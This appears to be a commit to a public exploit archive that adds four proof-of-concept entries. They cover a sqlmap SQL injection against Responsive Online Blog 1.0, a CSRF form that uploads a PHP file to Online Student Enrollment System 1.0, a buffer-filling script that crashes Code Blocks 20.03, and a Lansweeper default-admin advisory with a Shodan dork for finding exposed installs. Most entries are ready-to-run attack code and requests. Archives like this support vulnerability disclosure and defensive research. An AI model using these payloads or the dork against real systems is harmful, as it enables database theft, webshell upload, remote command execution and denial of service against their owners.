DB: 2020-06-24

4 changes to exploits/shellcodes Code Blocks 20.03 - Denial Of Service (PoC) Lansweeper 7.2 - Incorrect Access Control Responsive Online Blog 1.0 - 'id' SQL Injection Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
2020-06-24 05:01:53 +00:00 · 2020-06-24 05:01:53 +00:00 · b8629afe42
commit b8629afe42
parent 09b5d3c1b6
5 changed files with 202 additions and 0 deletions
--- a/exploits/php/webapps/48615.txt
+++ b/exploits/php/webapps/48615.txt
@ -0,0 +1,21 @@
+# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
+# Date: 2020-06-23
+# Exploit Author: Eren Şimşek
+# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
+# Version: v1.0
+# Tested on: Linux - Wamp Server
+
+>Vulnerable File
+   /category.php
+
+>Vulnerable Code
+
+   $id=$_REQUEST['id'];
+   $query="SELECT * from blog_categories where id='".$id."'";
+   Id parameter enters sql query without any changes
+
+>Proof Of Concept
+   sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch
+   OR
+   http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error
--- a/exploits/php/webapps/48616.txt
+++ b/exploits/php/webapps/48616.txt
@ -0,0 +1,89 @@
+# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
+# Google Dork: N/A
+# Date: 2020-06-20
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability:
+
+This product is unprotected against CSRF vulnerabilities.
+The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests.
+you can upload a PHP file here with CSRF.
+
+# CSRF PoC( add student ,File Upload):
+
+<html>
+<body>
+<form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student">
+		    <label for="name">Student Name</label>
+		    <input name="name" type="text" id="name" value="" required=""><br/>
+		    <label for="roll">Student Roll</label>
+		    <input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/>
+		    <label for="address">Student Address</label>
+		    <input name="address" type="text" value="" id="address" required=""><br/>
+		    <label for="pcontact">Parant Contact NO</label>
+		    <input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/>
+		    <label for="class">Student Class</label>
+		    <select name="class" class="form-control" id="class" required=""><br/>
+		    	<option>Select</option>
+		    	<option value="1st">1st</option>
+		    	<option value="2nd">2nd</option>
+		    	<option value="3rd">3rd</option>
+		    	<option value="4th">4th</option>
+		    	<option value="5th">5th</option>
+		    </select><br/>
+		    <label for="photo">Student Photo</label>
+		    <input name="photo" type="file" id="photo" required=""><br/>
+		    <input name="addstudent" value="Add Student" type="submit" class="btn btn-danger">
+	 </form>
+  </body>
+</html>
+
+#HTTP Request:
+
+http://localhost/student_enrollment/admin/index.php?page=add-student
+
+POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------1586330740172
+Content-Length: 1669
+Referer: http://localhost/exploit2.php
+Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------1586330740172: undefined
+Content-Disposition: form-data; name="name"
+bkpatron
+-----------------------------1586330740172
+Content-Disposition: form-data; name="roll"
+
+333000
+-----------------------------1586330740172
+Content-Disposition: form-data; name="address"
+
+0000
+-----------------------------1586330740172
+Content-Disposition: form-data; name="pcontact"
+
+01911111111
+-----------------------------1586330740172
+Content-Disposition: form-data; name="class"
+
+1st
+-----------------------------1586330740172
+Content-Disposition: form-data; name="photo"; filename="up.php"
+Content-Type: application/octet-stream
+...
+
+// uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php
--- a/exploits/windows/dos/48617.py
+++ b/exploits/windows/dos/48617.py
@ -0,0 +1,34 @@
+# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC) 
+# Vendor Homepage: http://www.codeblocks.org/ 
+# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-23
+# Vulnerable Software: Code Blocks
+# Version: 20.03
+# Vulnerability Type: Denial of Service (DoS)
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: CodeBlocksCrash.py
+#   2.- Copy content to clipboard
+#   3.- Open "codeblocks.exe"
+#   4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
+#   5.- Select "Active project's symbols" from drop down "View:" menu.
+#   6.- Paste ClipBoard into the "Search:" field.
+#   7.- Press Enter from keyboard.
+#   8.- Crashed.
+
+
+##################################################################################################################################################
+
+
+#Python "CodeBlocksCrash.py" Code:
+
+f= open("CodeBlocksCrash.txt", "w")
+
+payload="\x41" * 5000
+
+f.write(payload)
+
+f.close()
--- a/exploits/windows/local/48618.txt
+++ b/exploits/windows/local/48618.txt
@ -0,0 +1,54 @@
+# Exploit Title: Lansweeper 7.2 - Incorrect Access Control
+# SHODAN DORK : title:"Lansweeper - Login"
+# Date: 2020-06-14
+# Exploit Author: Amel BOUZIANE-LEBLOND
+# Vendor Homepage: https://www.lansweeper.com/
+# Software Link: https://www.lansweeper.com
+# Version: 6.0.x through 7.2.x
+# Tested on: Windows
+# CVE : CVE-2020-14011
+
+### Title:
+Incorrect Access Control.
+
+### Category:
+Exploit
+
+### Severity:
+Critical
+
+### Description:
+Lansweeper 6.0.x through 7.2.x has a default installation in which the 
+admin password is configured for the admin account, unless "Built-in 
+admin" is manually unchecked. This allows command execution via the 
+Add New Package and Scheduled Deployments features.
+
+### Other observation:
+Hi, This issue is kind of critical,
+By using shodan with this filter title:"Lansweeper - Login"
+We will find some Lansweeper with default installation on it
+
+
+### Details:
+The Lansweeper application is agentless network inventory software that can be used for IT asset management.
+It uses the ASP.NET technology on its web application.
+
+### Analysis:
+When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time,
+you are presented with a First Run Wizard, 
+which allows you to set up scanning and configure some basic options.
+Any subsequent times you access the console, 
+you are presented with a login screen.
+By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button.
+
+### Suggested mitigation:
+restrict access to the console and configure what users can see or do once they've been granted access.
+You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. 
+A user's role determines what the user can see or do within the console..
+
+### Impact/Risk:
+Remote code execution
+can expose the organization to unauthorized access of data and programs, fraud.
+
+-- 
+Amel BOUZIANE-LEBLOND
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6751,6 +6751,7 @@ id,file,description,date,author,type,platform,port
 38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
 43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
 48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
+48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11112,6 +11113,7 @@ id,file,description,date,author,type,platform,port
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
 48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows,
+48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42871,3 +42873,5 @@ id,file,description,date,author,type,platform,port
 48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
+48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
+48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,